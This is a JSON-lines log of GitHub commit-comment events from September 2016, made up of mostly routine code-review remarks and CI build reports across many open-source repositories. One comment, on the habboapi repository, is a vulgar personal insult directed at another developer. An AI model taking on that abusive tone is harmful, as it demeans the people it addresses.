{"id":"4603784288","type":"CommitCommentEvent","actor":{"login":"ahfergus1"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19133578,"position":221,"line":570,"path":"kern/drivers/dev/sdiahci.c","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-22T17:05:06Z","updated_at":"2016-09-22T17:05:06Z","body":"I just changed the name of the variable to prdt to make it easier to read.  Both ports and prdts were referred to as p in the code and I found it confusing."}},"created_at":"2016-09-22T17:05:06Z"}
{"id":"4603784642","type":"CommitCommentEvent","actor":{"login":"fidian"},"repo":{"name":"tests-always-included/style-guide"},"payload":{"comment":{"id":19133580,"position":14,"line":14,"path":"lang/js/index.md","commit_id":"1ca18d7e825df017be3055d81cd85a0673987e66","created_at":"2016-09-22T17:05:10Z","updated_at":"2016-09-22T17:05:10Z","body":"Doh, it says CSS but it should be JavaScript.  I'll update."}},"created_at":"2016-09-22T17:05:10Z"}
{"id":"4603786427","type":"CommitCommentEvent","actor":{"login":"maximveksler"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":19133583,"position":null,"line":null,"path":null,"commit_id":"fa64b4a52656cf31e4139176b68291b8dd4280b6","created_at":"2016-09-22T17:05:30Z","updated_at":"2016-09-22T17:05:30Z","body":"👍 "}},"created_at":"2016-09-22T17:05:30Z"}
{"id":"4603788615","type":"CommitCommentEvent","actor":{"login":"t4professor"},"repo":{"name":"t4professor/TEST"},"payload":{"comment":{"id":19133587,"position":null,"line":null,"path":null,"commit_id":"1be1419e302feedc345693a1f6c1816dfd9bc12f","created_at":"2016-09-22T17:05:56Z","updated_at":"2016-09-22T17:05:56Z","body":"df"}},"created_at":"2016-09-22T17:05:56Z"}
{"id":"4603789232","type":"CommitCommentEvent","actor":{"login":"fidian"},"repo":{"name":"tests-always-included/style-guide"},"payload":{"comment":{"id":19133590,"position":56,"line":56,"path":"lang/js/index.md","commit_id":"1ca18d7e825df017be3055d81cd85a0673987e66","created_at":"2016-09-22T17:06:03Z","updated_at":"2016-09-22T17:06:03Z","body":"No, ESLint directives must use `/*` style comments."}},"created_at":"2016-09-22T17:06:03Z"}
{"id":"4603791428","type":"CommitCommentEvent","actor":{"login":"javierluraschi"},"repo":{"name":"rstudio/sparklyr"},"payload":{"comment":{"id":19133596,"position":15,"line":47,"path":"README.md","commit_id":"49198b2aea99f6a7bc76fd9faafeb91079d66227","created_at":"2016-09-22T17:06:29Z","updated_at":"2016-09-22T17:06:29Z","body":"Updated."}},"created_at":"2016-09-22T17:06:29Z"}
{"id":"4603792315","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19133601,"position":null,"line":null,"path":null,"commit_id":"c0d1ee363f8a0e797ce5e648f76495563a237aae","created_at":"2016-09-22T17:06:39Z","updated_at":"2016-09-22T17:06:39Z","body":"Initial commit"}},"created_at":"2016-09-22T17:06:39Z"}
{"id":"4603792864","type":"CommitCommentEvent","actor":{"login":"rohansdhek"},"repo":{"name":"rohansdhek/r3-chat"},"payload":{"comment":{"id":19133602,"position":null,"line":null,"path":null,"commit_id":"358fd6215fec76c60194bce8c8ef97dac0dcf477","created_at":"2016-09-22T17:06:46Z","updated_at":"2016-09-22T17:06:46Z","body":"cool code...."}},"created_at":"2016-09-22T17:06:46Z"}
{"id":"4603795990","type":"CommitCommentEvent","actor":{"login":"ahfergus1"},"repo":{"name":"ahfergus1/akaros"},"payload":{"comment":{"id":19133612,"position":305,"line":768,"path":"kern/drivers/dev/sdiahci.c","commit_id":"5f841248458aa21d383cca9b569f865f07c4842d","created_at":"2016-09-22T17:07:25Z","updated_at":"2016-09-22T17:07:25Z","body":"Ok, that would make sense.  Should I make a set_<STRUCT>_bit(...) function for each structure the the read/write fucntions?  There at least five of them now so making one for each sort of makes it messy."}},"created_at":"2016-09-22T17:07:25Z"}
{"id":"4603796927","type":"CommitCommentEvent","actor":{"login":"mafintosh"},"repo":{"name":"electron-userland/electron-prebuilt"},"payload":{"comment":{"id":19133619,"position":null,"line":null,"path":null,"commit_id":"509a04db63bd6f372de4ce6ac88dbe28a241b3a3","created_at":"2016-09-22T17:07:36Z","updated_at":"2016-09-22T17:07:36Z","body":"I dont really understand your use case sorry. You should probably open an issue explaining the problem in greater detail. If you *really* need a specific release process you can always build your own using electron-downloader"}},"created_at":"2016-09-22T17:07:36Z"}
{"id":"4603797506","type":"CommitCommentEvent","actor":{"login":"AdamSupinski"},"repo":{"name":"AdamSupinski/WDTProject"},"payload":{"comment":{"id":19133625,"position":30,"line":30,"path":"src/main/java/asupinski/excel/ExcelReader.java","commit_id":"8739dc7b7701ff30aac17ec4d0c02607f73ca2b8","created_at":"2016-09-22T17:07:43Z","updated_at":"2016-09-22T17:07:43Z","body":"Proszę o refactor metody tak, by nie przechowywała stanu w postaci excelowego Workbooka, lecz zwracała go jako rezultat wykonania. Opakowane w Optional, ponieważ może nie udać się otworzyć pliku (zamiast zwracania nulla)"}},"created_at":"2016-09-22T17:07:43Z"}
{"id":"4603799785","type":"CommitCommentEvent","actor":{"login":"pabloz"},"repo":{"name":"lontivero/PyChainpoint"},"payload":{"comment":{"id":19133630,"position":46,"line":46,"path":"chainpoint.py","commit_id":"99531bdf68b7e1f67196f4c50a0bf47a92189c12","created_at":"2016-09-22T17:08:09Z","updated_at":"2016-09-22T17:08:09Z","body":"I'm not 100% sure what this is doing (docstring, please?), perhaps you meant:\r\n\r\n```python\r\nel = obj.get(attr)\r\nassert isinstance(el, list), err_msg\r\nreturn el\r\n```"}},"created_at":"2016-09-22T17:08:09Z"}
{"id":"4603800173","type":"CommitCommentEvent","actor":{"login":"fidian"},"repo":{"name":"tests-always-included/style-guide"},"payload":{"comment":{"id":19133632,"position":58,"line":58,"path":"lang/js/index.md","commit_id":"1ca18d7e825df017be3055d81cd85a0673987e66","created_at":"2016-09-22T17:08:14Z","updated_at":"2016-09-22T17:08:14Z","body":"Agreed, but some things like `window` are globals and ESLint may not understand that they exist.  Also, when working with JavaScript libraries that work in browsers, they employ global variables.  Things like `moment` and `$` must be referenced globally.\r\n\r\nAdding wording:\r\n\r\n> A notable exception is when working with JavaScript that operates in a browser and 3rd party libraries\r\n are exposed only through global variables.\r\n"}},"created_at":"2016-09-22T17:08:14Z"}
{"id":"4603800660","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19133634,"position":null,"line":null,"path":null,"commit_id":"bfc48040efe7479a6aaf616faa59f4a0aa5e6370","created_at":"2016-09-22T17:08:19Z","updated_at":"2016-09-22T17:08:19Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2292 of 2493 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-bfc48040efe7479a6aaf616faa59f4a0aa5e6370-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-bfc48040efe7479a6aaf616faa59f4a0aa5e6370-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-91.94%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T17:08:19Z"}
{"id":"4603802863","type":"CommitCommentEvent","actor":{"login":"fidian"},"repo":{"name":"tests-always-included/style-guide"},"payload":{"comment":{"id":19133638,"position":106,"line":106,"path":"lang/js/index.md","commit_id":"1ca18d7e825df017be3055d81cd85a0673987e66","created_at":"2016-09-22T17:08:45Z","updated_at":"2016-09-22T17:08:45Z","body":"Fixed.  Will commit soon."}},"created_at":"2016-09-22T17:08:45Z"}
{"id":"4603803108","type":"CommitCommentEvent","actor":{"login":"montehurd"},"repo":{"name":"wikimedia/wikipedia-ios"},"payload":{"comment":{"id":19133641,"position":15,"line":16,"path":"Wikipedia/Code/AFHTTPRequestSerializer+WMFRequestHeaders.m","commit_id":"b274265aeb423edea5192ae8906ec604bb29e4fb","created_at":"2016-09-22T17:08:48Z","updated_at":"2016-09-22T17:08:48Z","body":"Maybe make a method that gets passed the preferred languages so we can add a couple tests. A test or 2 where we can see the expected output might make what's going on in the logic below a little less opaque. "}},"created_at":"2016-09-22T17:08:48Z"}
{"id":"4603804954","type":"CommitCommentEvent","actor":{"login":"AdamSupinski"},"repo":{"name":"AdamSupinski/WDTProject"},"payload":{"comment":{"id":19133650,"position":50,"line":50,"path":"src/main/java/asupinski/excel/ExcelReader.java","commit_id":"8739dc7b7701ff30aac17ec4d0c02607f73ca2b8","created_at":"2016-09-22T17:09:10Z","updated_at":"2016-09-22T17:09:10Z","body":"Proszę o refactor metody, by jako parametr przyjmowała Workbook i wyłącznie on był parsowany.\r\nDo rozważenia: przeniesienie tworzenia nowego produktu oraz sprawdzania pustych wierszy i ich pomijania do oddzielnych metod."}},"created_at":"2016-09-22T17:09:10Z"}
{"id":"4603808052","type":"CommitCommentEvent","actor":{"login":"pabloz"},"repo":{"name":"lontivero/PyChainpoint"},"payload":{"comment":{"id":19133657,"position":51,"line":51,"path":"chainpoint.py","commit_id":"99531bdf68b7e1f67196f4c50a0bf47a92189c12","created_at":"2016-09-22T17:09:31Z","updated_at":"2016-09-22T17:09:31Z","body":"again, hash is a builtin function. Use another name"}},"created_at":"2016-09-22T17:09:31Z"}
{"id":"4603808149","type":"CommitCommentEvent","actor":{"login":"fidian"},"repo":{"name":"tests-always-included/style-guide"},"payload":{"comment":{"id":19133658,"position":108,"line":108,"path":"lang/js/index.md","commit_id":"1ca18d7e825df017be3055d81cd85a0673987e66","created_at":"2016-09-22T17:09:33Z","updated_at":"2016-09-22T17:09:33Z","body":"Text is plural.  Reworded slightly:\r\n\r\n> The wording should come from an HTML template, a JSON file from a server or API calls.  Provide codes, not text strings."}},"created_at":"2016-09-22T17:09:33Z"}
{"id":"4603818863","type":"CommitCommentEvent","actor":{"login":"fidian"},"repo":{"name":"tests-always-included/style-guide"},"payload":{"comment":{"id":19133680,"position":411,"line":411,"path":"lang/js/index.md","commit_id":"1ca18d7e825df017be3055d81cd85a0673987e66","created_at":"2016-09-22T17:11:33Z","updated_at":"2016-09-22T17:11:33Z","body":"Good catch.  Actually, it should be this:\r\n\r\n    /* Normally `copyProperty` would be an inline arrow function.\r\n     * It is a standalone function here for illustrative purposes.\r\n     */"}},"created_at":"2016-09-22T17:11:33Z"}
{"id":"4603823154","type":"CommitCommentEvent","actor":{"login":"fidian"},"repo":{"name":"tests-always-included/style-guide"},"payload":{"comment":{"id":19133687,"position":428,"line":428,"path":"lang/js/index.md","commit_id":"1ca18d7e825df017be3055d81cd85a0673987e66","created_at":"2016-09-22T17:12:24Z","updated_at":"2016-09-22T17:12:24Z","body":"Fixed."}},"created_at":"2016-09-22T17:12:24Z"}
{"id":"4603830650","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19133711,"position":null,"line":null,"path":null,"commit_id":"bfc48040efe7479a6aaf616faa59f4a0aa5e6370","created_at":"2016-09-22T17:13:52Z","updated_at":"2016-09-22T17:13:52Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-bfc48040efe7479a6aaf616faa59f4a0aa5e6370-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-22T17:13:52Z"}
{"id":"4603830759","type":"CommitCommentEvent","actor":{"login":"moe45673"},"repo":{"name":"moe45673/ZaveDevelopment"},"payload":{"comment":{"id":19133713,"position":null,"line":null,"path":null,"commit_id":"05f566e5a6e2bc8ec99bc1fb6c0b6d295f86b6af","created_at":"2016-09-22T17:13:54Z","updated_at":"2016-09-22T17:13:54Z","body":"Addresses Issue #5 "}},"created_at":"2016-09-22T17:13:54Z"}
{"id":"4603831128","type":"CommitCommentEvent","actor":{"login":"scottyw"},"repo":{"name":"ilovezfs/homebrew-core"},"payload":{"comment":{"id":19133714,"position":6,"line":4,"path":"Formula/leiningen.rb","commit_id":"53dec4642dc35ab35445a1afc3cd41e0f192b2b5","created_at":"2016-09-22T17:13:58Z","updated_at":"2016-09-22T17:13:58Z","body":"Does line 17 need bumped to 2.7.1 too?"}},"created_at":"2016-09-22T17:13:58Z"}
{"id":"4603846731","type":"CommitCommentEvent","actor":{"login":"bridiver"},"repo":{"name":"electron-userland/electron-prebuilt"},"payload":{"comment":{"id":19133751,"position":null,"line":null,"path":null,"commit_id":"509a04db63bd6f372de4ce6ac88dbe28a241b3a3","created_at":"2016-09-22T17:16:57Z","updated_at":"2016-09-22T17:16:57Z","body":"https://github.com/electron-userland/electron-prebuilt/issues/192\r\nbut even if you still don't understand, allowing an env/npmrc override for the version wouldn't cause any problems and you could still fall back to packages.json version if it doesn't exist"}},"created_at":"2016-09-22T17:16:57Z"}
{"id":"4603857529","type":"CommitCommentEvent","actor":{"login":"nusenu"},"repo":{"name":"nusenu/ansible-relayor"},"payload":{"comment":{"id":19133770,"position":61,"line":64,"path":"tasks/apt_install.yml","commit_id":"39fbe7f19f98a707e773e1620c19968e0433a4e0","created_at":"2016-09-22T17:19:00Z","updated_at":"2016-09-22T17:19:00Z","body":"This is actually a fix to a YAML syntax-unrelated problem, but it went in with this commit.."}},"created_at":"2016-09-22T17:19:00Z"}
{"id":"4603858034","type":"CommitCommentEvent","actor":{"login":"alflanagan"},"repo":{"name":"nteract/hydrogen"},"payload":{"comment":{"id":19133772,"position":null,"line":null,"path":null,"commit_id":"e1eb707ae1ec250b419a06ca53687528fc4fb362","created_at":"2016-09-22T17:19:06Z","updated_at":"2016-09-22T17:19:06Z","body":"Apparently there was a reason to change the color from blue: #349."}},"created_at":"2016-09-22T17:19:06Z"}
{"id":"4603861056","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19133787,"position":null,"line":null,"path":null,"commit_id":"90ed550c3f6477a6c057eba6283312f74e26bafe","created_at":"2016-09-22T17:19:41Z","updated_at":"2016-09-22T17:19:41Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1788 of 1788 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-90ed550c3f6477a6c057eba6283312f74e26bafe-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-90ed550c3f6477a6c057eba6283312f74e26bafe-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-22T17:19:41Z"}
{"id":"4603866224","type":"CommitCommentEvent","actor":{"login":"mrjbq7"},"repo":{"name":"factor/factor"},"payload":{"comment":{"id":19133825,"position":null,"line":null,"path":null,"commit_id":"c02d9135797b1f4c3f4b4fda5c6826e2cb17ff4f","created_at":"2016-09-22T17:20:37Z","updated_at":"2016-09-22T17:20:37Z","body":"Cool!\r\n\r\nDo you see a slowdown in ``benchmark.gc2``?  The other gc benchmarks look same or a little bit faster."}},"created_at":"2016-09-22T17:20:37Z"}
{"id":"4603872097","type":"CommitCommentEvent","actor":{"login":"willwsharp"},"repo":{"name":"willwsharp/jasmine-parameterize"},"payload":{"comment":{"id":19133846,"position":null,"line":null,"path":null,"commit_id":"cb159018f79d1b8f85bf08101b0eafaf3122e8e7","created_at":"2016-09-22T17:21:44Z","updated_at":"2016-09-22T17:21:44Z","body":"Also made some formatting updates to make things more consistent."}},"created_at":"2016-09-22T17:21:44Z"}
{"id":"4603873357","type":"CommitCommentEvent","actor":{"login":"Faokryn"},"repo":{"name":"mozillascience/software-citation-tools"},"payload":{"comment":{"id":19133850,"position":5,"line":5,"path":"README.md","commit_id":"f31ad33a1804b36664f0610e7d84d0d17f2b6963","created_at":"2016-09-22T17:21:59Z","updated_at":"2016-09-22T17:21:59Z","body":"The current wording is in future tense.  Would \"At the core of the suite of tools will be a package written in JavaScript using npm\" be acceptable, or should the rest of the wording to be in present tense as well?"}},"created_at":"2016-09-22T17:21:59Z"}
{"id":"4603882186","type":"CommitCommentEvent","actor":{"login":"cnishina"},"repo":{"name":"angular/angular.io"},"payload":{"comment":{"id":19133870,"position":4,"line":3,"path":"public/docs/_examples/architecture/e2e-spec.ts","commit_id":"bbe2a9322bbfaafaee17acc7c8ca281e64c51b6e","created_at":"2016-09-22T17:23:39Z","updated_at":"2016-09-22T17:23:39Z","body":"You could also import ElementFinder in this line"}},"created_at":"2016-09-22T17:23:39Z"}
{"id":"4603886415","type":"CommitCommentEvent","actor":{"login":"KeriWarr"},"repo":{"name":"gaearon/redux-devtools"},"payload":{"comment":{"id":19133875,"position":20,"line":19,"path":"examples/todomvc/index.js","commit_id":"64f58b7010a1b2a71ad16716eb37ac1031f93915","created_at":"2016-09-22T17:24:24Z","updated_at":"2016-09-22T17:24:24Z","body":"hm. thanks for the comment, but as far as I can tell I am now doing both of those things, and the error persists. Time to dig deeper"}},"created_at":"2016-09-22T17:24:24Z"}
{"id":"4603887109","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19133879,"position":null,"line":null,"path":null,"commit_id":"90ed550c3f6477a6c057eba6283312f74e26bafe","created_at":"2016-09-22T17:24:31Z","updated_at":"2016-09-22T17:24:31Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-90ed550c3f6477a6c057eba6283312f74e26bafe-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T17:24:31Z"}
{"id":"4603889390","type":"CommitCommentEvent","actor":{"login":"epkann"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19133887,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-22T17:24:56Z","updated_at":"2016-09-22T17:24:56Z","body":"Real quick:\n\nWhy does \"n := &Node{Value: v}\" work, but \"n := new(Node{Value: v}) not?\n\n\nOn Wed, Sep 21, 2016 at 6:39 PM, Joe Tsai <notifications@github.com> wrote:\n\n> It is sufficient to prove equality with just <, assuming that the\n> implementation of < is sensible when it comes to defining some type of\n> order (Note that NaN has weird properties where NaN != NaN)\n>\n> If a < b is false and b < a is false, then we know that a == b.\n> Generally, you don't care about equality, unless you want to provide some\n> guarantee of \"stability\" in your data structure sorting order.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/epkann/Data-Structures/commit/2298f8a0d3b806966a36670d789ccc5a2b761d4f#commitcomment-19122702>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASib12Dyoh8z_X1AmjfziMUhYwdKiYCDks5qscAhgaJpZM4KCOtE>\n> .\n>\n\n\n\n-- \nwww.esthertsai.com\n"}},"created_at":"2016-09-22T17:24:56Z"}
{"id":"4603891214","type":"CommitCommentEvent","actor":{"login":"andres-jordan"},"repo":{"name":"andres-jordan/gaia_tools"},"payload":{"comment":{"id":19133891,"position":null,"line":null,"path":null,"commit_id":"daff04a2070cd50b76b9e1f51464fa6bc37a51ad","created_at":"2016-09-22T17:25:17Z","updated_at":"2016-09-22T17:25:17Z","body":"Hi Jo,\r\n\r\nGreat, thanks! I will ask my students to clone your repository directly.\r\n\r\nAndres"}},"created_at":"2016-09-22T17:25:17Z"}
{"id":"4603892258","type":"CommitCommentEvent","actor":{"login":"acabunoc"},"repo":{"name":"mozillascience/software-citation-tools"},"payload":{"comment":{"id":19133898,"position":5,"line":5,"path":"README.md","commit_id":"f31ad33a1804b36664f0610e7d84d0d17f2b6963","created_at":"2016-09-22T17:25:30Z","updated_at":"2016-09-22T17:25:30Z","body":"I just think you need to explain what \"The package\" is before you mention \"The package\" -- right now it reads as if The package is the Software Citation Tools. Either tense is fine."}},"created_at":"2016-09-22T17:25:30Z"}
{"id":"4603896768","type":"CommitCommentEvent","actor":{"login":"cnishina"},"repo":{"name":"angular/angular.io"},"payload":{"comment":{"id":19133914,"position":15,"line":77,"path":"public/docs/_examples/cb-dependency-injection/e2e-spec.ts","commit_id":"bbe2a9322bbfaafaee17acc7c8ca281e64c51b6e","created_at":"2016-09-22T17:26:19Z","updated_at":"2016-09-22T17:26:19Z","body":"We could use `target.getWebElement()` instead of `target as any as WebElement`."}},"created_at":"2016-09-22T17:26:19Z"}
{"id":"4603908372","type":"CommitCommentEvent","actor":{"login":"ShetiPhian"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":19133940,"position":108,"line":1322,"path":"src/main/java/net/minecraftforge/client/model/obj/OBJModel.java","commit_id":"ce481da1d1f062a7fcace09a643c9adf69006081","created_at":"2016-09-22T17:28:30Z","updated_at":"2016-09-22T17:28:30Z","body":"I think the condition is inverted because then returning Optional.absent() hides the model part, and providing a transformation renders the part.\r\nThe provided transformation is ignored though because of line 1368: _transform = modelState.apply(Optional.<IModelPart>absent());_\r\nChanging that line to _transform = modelState.apply(Optional.of(Models.getHiddenModelPart(ImmutableList.of(g.getName()))));_ fixes that.\r\n\r\nAnother reason I believe theses are errors, is there doesn't appear to be a way to change the transforms anymore. In the previous system you could hide parts and change the transforms.\r\n\r\nAlso modelState.apply fits its naming as well; if a transform is provided it is applied to the part, otherwise the part is hidden"}},"created_at":"2016-09-22T17:28:30Z"}
{"id":"4603909540","type":"CommitCommentEvent","actor":{"login":"cnishina"},"repo":{"name":"angular/angular.io"},"payload":{"comment":{"id":19133943,"position":15,"line":60,"path":"public/docs/_examples/cb-ts-to-js/e2e-spec.ts","commit_id":"bbe2a9322bbfaafaee17acc7c8ca281e64c51b6e","created_at":"2016-09-22T17:28:44Z","updated_at":"2016-09-22T17:28:44Z","body":"use `h1.getWebElement()`"}},"created_at":"2016-09-22T17:28:44Z"}
{"id":"4603910453","type":"CommitCommentEvent","actor":{"login":"chrismpettyjohn"},"repo":{"name":"billsonnn/habboapi"},"payload":{"comment":{"id":19133945,"position":null,"line":null,"path":null,"commit_id":"3d20bb50e5248f37aad1462c1848ab3e492ff15c","created_at":"2016-09-22T17:28:55Z","updated_at":"2016-09-22T17:28:55Z","body":"why did you have this in the first place you cunt"}},"created_at":"2016-09-22T17:28:55Z"}
{"id":"4603911552","type":"CommitCommentEvent","actor":{"login":"Tratcher"},"repo":{"name":"aspnet/Diagnostics"},"payload":{"comment":{"id":19133948,"position":4,"line":46,"path":"src/Microsoft.AspNetCore.Diagnostics.Elm/project.json","commit_id":"1b1bd34b8d1e42f74a2a438b2ed87af28b5dd016","created_at":"2016-09-22T17:29:10Z","updated_at":"2016-09-22T17:29:10Z","body":"The actual fix is here: https://github.com/aspnet/Common/pull/152"}},"created_at":"2016-09-22T17:29:10Z"}
{"id":"4603912275","type":"CommitCommentEvent","actor":{"login":"tatted001"},"repo":{"name":"mpc-hc/mpc-hc"},"payload":{"comment":{"id":19133952,"position":null,"line":null,"path":null,"commit_id":"fe1b4ebd1ab69109c898fd4aa250013e18d2d116","created_at":"2016-09-22T17:29:18Z","updated_at":"2016-09-22T17:29:18Z","body":"  EXTRA_CFLAGS=\"-D_WIN32_WINNT=0x0502 -DWINVER=0x0502 -I../../../thirdparty/include\"  \r\n 92   +  EXTRA_CFLAGS=\"-fno-tree-vectorize -D_WIN32_WINNT=0x0502 -DWINVER=0x0502 -I../../../thirdparty/include\"  \r\n93 93      EXTRA_LDFLAGS=\"\"  \r\n94 94      if [ \"${arch}\" == \"x86_64\" ]; then  \r\n95 95        OPTIONS=\"${OPTIONS} --enable-cross-compile --cross-prefix=${cross_prefix} --target-os=mingw32 --pkg-config=pkg-config\"  \r\n"}},"created_at":"2016-09-22T17:29:18Z"}
{"id":"4603913317","type":"CommitCommentEvent","actor":{"login":"cnishina"},"repo":{"name":"angular/angular.io"},"payload":{"comment":{"id":19133953,"position":10,"line":6,"path":"public/docs/_examples/protractor-helpers.ts","commit_id":"bbe2a9322bbfaafaee17acc7c8ca281e64c51b6e","created_at":"2016-09-22T17:29:30Z","updated_at":"2016-09-22T17:29:30Z","body":"Get rid of hacked in namespaces?"}},"created_at":"2016-09-22T17:29:30Z"}
{"id":"4603913671","type":"CommitCommentEvent","actor":{"login":"mozkeeler"},"repo":{"name":"mozilla/tls-observatory"},"payload":{"comment":{"id":19133954,"position":27,"line":59,"path":"certificate/certificate.go","commit_id":"8ba16a90a8f4e3333b549e5289d0c2155b834d14","created_at":"2016-09-22T17:29:35Z","updated_at":"2016-09-22T17:29:35Z","body":"For clarity, it might be helpful to call this a \"DistinguishedName\" or \"Name\" (which is what RFC 5280 uses)."}},"created_at":"2016-09-22T17:29:35Z"}
{"id":"4603926445","type":"CommitCommentEvent","actor":{"login":"mozkeeler"},"repo":{"name":"mozilla/tls-observatory"},"payload":{"comment":{"id":19133977,"position":55,"line":477,"path":"certificate/certificate.go","commit_id":"8ba16a90a8f4e3333b549e5289d0c2155b834d14","created_at":"2016-09-22T17:31:53Z","updated_at":"2016-09-22T17:31:53Z","body":"I'm surprised this type-checks (I guess I'm not that familiar with Go yet). In any case, would it be helpful to pass along `err` so the caller can do something useful?"}},"created_at":"2016-09-22T17:31:53Z"}
{"id":"4603926589","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19133978,"position":null,"line":null,"path":null,"commit_id":"a236e3799d08fc43546c7cb5c7204f70ef918444","created_at":"2016-09-22T17:31:55Z","updated_at":"2016-09-22T17:31:55Z","body":"MoreDayliteFollowup (JasonGlazer) - x86_64-MacOS-10.9-clang: OK (2329 of 2336 tests passed, 24 test warnings)\n\n * 31 tests had: AUD diffs.\n * 15 tests had: Table small diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: RDD diffs.\n * 7 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a236e3799d08fc43546c7cb5c7204f70ef918444-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a236e3799d08fc43546c7cb5c7204f70ef918444-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T17:31:55Z"}
{"id":"4603930684","type":"CommitCommentEvent","actor":{"login":"Jawshy"},"repo":{"name":"AsYetUntitled/Framework"},"payload":{"comment":{"id":19133982,"position":null,"line":null,"path":null,"commit_id":"4366db2359468e70351121603bd32ce792d352fb","created_at":"2016-09-22T17:32:42Z","updated_at":"2016-09-22T17:32:42Z","body":"`Jawshy` not `Jawsh`. "}},"created_at":"2016-09-22T17:32:42Z"}
{"id":"4603932112","type":"CommitCommentEvent","actor":{"login":"nohin677"},"repo":{"name":"nohin677/Surf"},"payload":{"comment":{"id":19133986,"position":31,"line":31,"path":"SurfsUp.java","commit_id":"724191a72d291d483f4c05974427e98116bf3660","created_at":"2016-09-22T17:32:58Z","updated_at":"2016-09-22T17:32:58Z","body":"test"}},"created_at":"2016-09-22T17:32:58Z"}
{"id":"4603933353","type":"CommitCommentEvent","actor":{"login":"EllaQuimica"},"repo":{"name":"humitos/argentinaenpython.com"},"payload":{"comment":{"id":19133992,"position":null,"line":null,"path":null,"commit_id":"2d1bb9bca5034a08df152d2cbfe9618cae365fc3","created_at":"2016-09-22T17:33:12Z","updated_at":"2016-09-22T17:33:12Z","body":"Actualizo a la versión https://github.com/DjangoGirls/tutorial/commit/c4471e79f93804c7b8e37b64d7634a89766c0a81 "}},"created_at":"2016-09-22T17:33:12Z"}
{"id":"4603934489","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"ChisZahkar-itstep/ITStep_Lesson_4"},"payload":{"comment":{"id":19133996,"position":2,"line":2,"path":"homework_4_1.cpp","commit_id":"5edae131c5bed0224edcdd5b94bbdc42e6503398","created_at":"2016-09-22T17:33:25Z","updated_at":"2016-09-22T17:33:25Z","body":"не жалейте пустых строк, если они повышают читаемость"}},"created_at":"2016-09-22T17:33:25Z"}
{"id":"4603937956","type":"CommitCommentEvent","actor":{"login":"riethm"},"repo":{"name":"softlayer/softlayer-go"},"payload":{"comment":{"id":19134010,"position":58,"line":58,"path":"session/xmlrpc.go","commit_id":"9e28558d8c983c6364d489969c5b06c27e7a307a","created_at":"2016-09-22T17:34:02Z","updated_at":"2016-09-22T17:34:02Z","body":"@renier Should we make 0 the default (consistent with Python and our own REST implementation?)"}},"created_at":"2016-09-22T17:34:02Z"}
